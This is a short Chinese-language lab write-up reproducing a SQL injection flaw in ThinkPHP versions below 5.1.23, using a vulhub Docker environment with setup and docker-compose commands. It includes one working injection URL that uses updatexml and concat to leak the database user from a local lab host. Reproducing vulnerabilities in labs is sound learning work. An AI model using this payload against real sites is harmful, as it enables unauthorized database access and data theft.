声明
好好学习,天天向上
漏洞描述
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。
PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入的漏洞。
影响范围
ThinkPHP < 5.1.23
复现过程
这里使用5.0.9版本
使用vulhub
/app/vulhub-master/thinkphp/in-sqlinjection
使用docker启动
docker-compose build
docker-compose up -d
环境启动后,访问
http://192.168.239.129
访问
http://192.168.239.129/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
再往下看
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down